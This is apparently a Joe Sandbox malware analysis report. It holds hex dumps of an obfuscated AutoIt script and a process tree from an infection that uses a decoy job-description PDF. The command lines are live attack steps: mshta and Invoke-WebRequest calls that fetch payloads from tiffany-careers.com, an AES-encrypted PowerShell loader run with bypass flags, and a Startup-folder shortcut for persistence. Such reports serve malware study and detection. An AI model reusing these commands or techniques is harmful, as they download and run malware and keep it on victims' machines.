                                                                                                                  Data Ascii: s("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3), Wales("82]121]104]117]121]108]104]122]48]86]104]113]119]104]113]102]104]118]48",9/3))ACos(9467)$waitsussex = $waitsussex + 1EndIfNext$WidescreenTrainAnatomy = 49$relat
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 6e 74 75 72 6e 20 3d 20 24 73 65 74 74 69 6e 67 73 6f 6d 65 72 73 65 74 76 65 67 65 74 61 72 69 61 6e 74 75 72 6e 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 73 61 66 65 6c 79 77 72 69 67 68 74 68 6f 6d 65 74 6f 77 6e 61 6c 75 6d 69 6e 75 6d 20 3d 20 27 33 36 39 37 38 35 33 37 31 35 37 39 30 37 33 38 30 39 34 30 37 38 36 30 31 32 32 36 32 39 34 34 39 32 30 31 30 31 33 30 37 38 38 39 31 32 36 38 38 37 39 32 31 31 33 35 31 30 36 37 34 37 35 32 31 27 0a 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 39 30 0a 24 41 67 61 69 6e 73 74 47 72 69 70 47 75 79 45 75 72 6f 70 65 20 3d 20 36 36 0a 57 68 69 6c 65 20 39 30 32 0a 49 66 20 24 44 65 66 69 6e 69 74 69 6f 6e 73 46 61 76 6f 75 72 69 74 65 73 55 72 69 20 3d 20 38 39
                                                                                                                  Data Ascii: nturn = $settingsomersetvegetarianturn + 1EndIfNext$safelywrighthometownaluminum = '36978537157907380940786012262944920101307889126887921135106747521'$DefinitionsFavouritesUri = 90$AgainstGripGuyEurope = 66While 902If $DefinitionsFavouritesUri = 89
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 37 20 54 68 65 6e 0a 41 54 61 6e 28 36 35 37 31 29 0a 43 68 72 28 38 37 35 38 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 2c 20 57 61 6c 65 73 28 22 38 34 5d 31 30 38 5d 31 31 37 5d 31 32 34 5d 34 39 5d 38 37 5d 31 30 34 5d 31 32 31 5d 31 32 33 5d 31 31 32 5d 31 30 36 5d 31 31 35 5d 31 30 38 5d 34 39 22 2c 32 38 2f 34 29 29 0a 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 20 3d 20 24 53 74 72 69 63 74 52 65 61 6c 74 6f 72 73 41
                                                                                                                  Data Ascii: StrictRealtorsAdministration = 7 ThenATan(6571)Chr(8758)PixelGetColor(Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4), Wales("84]108]117]124]49]87]104]121]123]112]106]115]108]49",28/4))$StrictRealtorsAdministration = $StrictRealtorsA
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 34 20 54 68 65 6e 0a 24 49 4e 48 45 52 49 54 45 44 45 4e 41 52 49 53 49 4e 47 20 3d 20 53 71 72 74 28 35 32 30 32 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 4a 65 4f 6b 61 79 20 3d 20 35 35 20 54 68 65 6e 0a 41 53 69 6e 28 31 39 39 33 29 0a 41 43 6f 73 28 32 38 32 33 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 38 30 5d 38 32 5d 37 33 5d 37 38 5d 36 37 5d 37 33 5d 38 30 5d 37 36 5d 36 39 5d 33 35 5d 37 31 5d 36 35 5d 37 37 5d 36 39 5d 38 33 5d 38 30 5d 37 39 5d 38 34 5d 33 35 22 2c 30 2f 35 29 29 0a 24 4a 65 4f 6b 61 79 20 3d 20 24 4a 65 4f 6b 61 79 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 52 6f
                                                                                                                  Data Ascii: $JeOkay + 1EndIfIf $JeOkay = 54 Then$INHERITEDENARISING = Sqrt(5202)ExitLoopEndIfIf $JeOkay = 55 ThenASin(1993)ACos(2823)ConsoleWriteError(Wales("80]82]73]78]67]73]80]76]69]35]71]65]77]69]83]80]79]84]35",0/5))$JeOkay = $JeOkay + 1EndIfNext$Ro
                                                                                                                  2024-12-23 06:12:02 UTC16384INData Raw: 73 69 6f 6e 20 3d 20 39 30 20 54 68 65 6e 0a 41 54 61 6e 28 33 36 31 31 29 0a 44 65 63 28 57 61 6c 65 73 28 22 37 35 5d 31 32 34 5d 31 30 33 5d 31 31 34 5d 31 32 33 5d 31 30 33 5d 31 32 32 5d 31 30 37 5d 33 38 22 2c 34 38 2f 38 29 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 37 31 5d 39 38 5d 31 30 30 5d 31 31 37 5d 31 31 32 5d 31 31 35 5d 31 32 32 5d 36 32 5d 38 33 5d 31 30 32 5d 31 30 39 5d 36 32 5d 38 34 5d 31 31 38 5d 31 31 36 5d 31 31 33 5d 31 30 32 5d 31 30 30 5d 31 31 37 5d 36 32 5d 37 34 5d 31 30 39 5d 31 30 39 5d 31 31 38 5d 31 31 36 5d 31 31 37 5d 31 31 35 5d 39 38 5d 31 31 37 5d 31 30 32 5d 31 30 31 5d 36 32 22 2c 35 2f 35 29 29 0a 24 54 72 69 70 6c 65 43 6f 6e 63 6c 75 73 69 6f 6e 20 3d 20 24 54 72 69 70 6c 65 43 6f 6e 63 6c
                                                                                                                  Data Ascii: sion = 90 ThenATan(3611)Dec(Wales("75]124]103]114]123]103]122]107]38",48/8))DriveStatus(Wales("71]98]100]117]112]115]122]62]83]102]109]62]84]118]116]113]102]100]117]62]74]109]109]118]116]117]115]98]117]102]101]62",5/5))$TripleConclusion = $TripleConcl
                                                                                                                  2024-12-23 06:12:03 UTC16384INData Raw: 24 42 55 54 4b 4e 49 54 54 49 4e 47 43 48 52 4f 4d 45 2c 20 24 63 61 6e 62 65 72 72 61 66 75 6e 64 61 6d 65 6e 74 61 6c 65 76 69 6c 63 65 6f 29 0a 24 43 6f 6e 73 74 72 61 69 6e 74 47 65 6e 64 65 72 49 6e 74 65 72 70 72 65 74 61 74 69 6f 6e 20 3d 20 27 34 35 31 35 34 39 32 35 36 34 37 32 30 35 37 32 37 37 32 33 33 32 39 34 34 32 36 33 36 37 38 35 35 38 38 37 30 27 0a 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 31 0a 24 54 69 6e 44 65 74 65 72 6d 69 6e 65 50 65 72 73 6f 6e 20 3d 20 37 38 0a 46 6f 72 20 24 6e 45 53 52 72 5a 41 20 3d 20 35 32 20 54 6f 20 39 31 33 0a 49 66 20 24 57 69 6c 6c 69 6e 67 57 65 62 70 61 67 65 46 61 73 68 69 6f 6e 20 3d 20 33 30 20 54 68 65 6e 0a 45 78 70 28 35 32 33 34 29 0a 41 43 6f 73 28 35 34 39
                                                                                                                  Data Ascii: $BUTKNITTINGCHROME, $canberrafundamentalevilceo)$ConstraintGenderInterpretation = '4515492564720572772332944263678558870'$WillingWebpageFashion = 31$TinDeterminePerson = 78For $nESRrZA = 52 To 913If $WillingWebpageFashion = 30 ThenExp(5234)ACos(549


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
                                                                                                                  Imagebase:0x7ff701b90000
                                                                                                                  File size:576'000 bytes
                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:01:11:28
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:01:11:30
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:01:11:31
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1
                                                                                                                  Imagebase:0x7ff7eeb30000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:01:11:34
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:01:11:36
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:01:11:36
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:01:11:46
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
                                                                                                                  Imagebase:0x7ff686a00000
                                                                                                                  File size:5'641'176 bytes
                                                                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:01:11:46
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                  Imagebase:0x7ff6413e0000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:01:11:47
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                  Imagebase:0x7ff6413e0000
                                                                                                                  File size:3'581'912 bytes
                                                                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:01:11:51
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\rMpqCJnPv.exe"
                                                                                                                  Imagebase:0x7ff7bb7e0000
                                                                                                                  File size:1'083'904 bytes
                                                                                                                  MD5 hash:7E279E8E3DCD0BCD240E36D7317924D3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 30%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:01:11:52
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:01:11:52
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:01:11:58
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:01:11:58
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:01:12:03
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\Public\Guard.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                                  Imagebase:0xde0000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:01:12:05
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:01:12:05
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:01:12:16
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                                  Imagebase:0x7ff794d10000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:01:12:17
                                                                                                                  Start date:23/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                                  Imagebase:0x870000
                                                                                                                  File size:893'608 bytes
                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2091933957.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                                                                    • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                                                                    • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                                                                    • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:12.1%
                                                                                                                    Total number of Nodes:1478
                                                                                                                    Total number of Limit Nodes:46
